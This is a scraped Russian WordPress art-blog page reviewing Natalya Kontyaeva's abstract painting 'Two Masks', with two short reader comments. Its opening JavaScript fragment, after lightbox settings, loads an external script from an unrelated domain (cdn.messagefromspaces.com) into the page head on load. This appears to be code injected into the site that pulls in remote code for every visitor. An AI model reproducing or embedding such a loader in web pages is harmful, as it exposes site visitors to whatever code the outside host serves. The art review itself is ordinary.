, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картина Две маски от художницы Натальи Контяевой

Автор: Наталья Юрова | 25 Июн 2012

Картина Две маски Представляем вам работу художницы Натальи Контяевой.  «Две маски».  Картина написана в стиле абстракции, поэтому  дает волю нашему воображению.

Несмотря на прямые и строгие линии в изображении, она выглядит очень гармонично,  вызывает теплые чувства и создает положительные образы.  Например, две маски, которые выполнены в оранжево-красных тонах и направлены лицом друг к другу,   вместе создают единый образ: солнце! Яркое, знойное, горячее и поэтому вызывающее радость и прилив энергии.  Можно увидеть, что солнце улыбается…

Очень часто мы можем видеть изображение солнца, когда рассматриваем  картины, на которых изображены воины Руси. Они всегда несли с собой знамена с изображением солнца, как символ света и жизни.

Но картина «Две маски» интересна и тем, что она – многообразна в видении. Так, можно увидеть, как два лика сливаются в поцелуе. Не зря, другое название, которое дала Наталья Контяева своему произведению - «Поцелуй». Мы видим, что Он и Она соединяются воедино. Соединяются чувственно и эмоционально, именно поэтому глаза у ликов закрыты: ничто не отвлекает их от этого  слияния…

Абстракция написана на холсте акрилом. Ее краски оживают в яркости и насыщенности цвета.  Сочетание прямых и плавных линий смотрится очень современно и стильно. Её отлично можно повесить в гостиную или кабинет, имеющих строгий дизайн и цветовую гамму. Например,  мебель, декор, предметы интерьера будут иметь прямые линии и углы, и выполнены в спокойных тонах и оттенках,  схожих по цвету. В таком  пространстве картина будет привлекать к себе внимание своей красочностью, сочностью и «разбавит» строгость интерьера. В данном сочетании ни интерьер, ни картина не потеряют своей индивидуальности и, наоборот, подчеркнут достоинства дуг друга.

Еще работы  художницы Натальи Контяевой "Сны"Серия абстрактных картин «Линии»Танцующие цветы

Темы: Галерея картин художников, Критика | Отзывов: 2 »

Отзывов: 2 на “Картина Две маски от художницы Натальи Контяевой”

  1. Lena пишет:
    07 Авг 2012 в 15:06

    Здорово… напоминает многое от известных, но на самом деле – совсем другое!

  2. Леонид Исаков пишет:
    13 Сен 2014 в 00:03

    По этой работе сделал бы оконную фреску.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress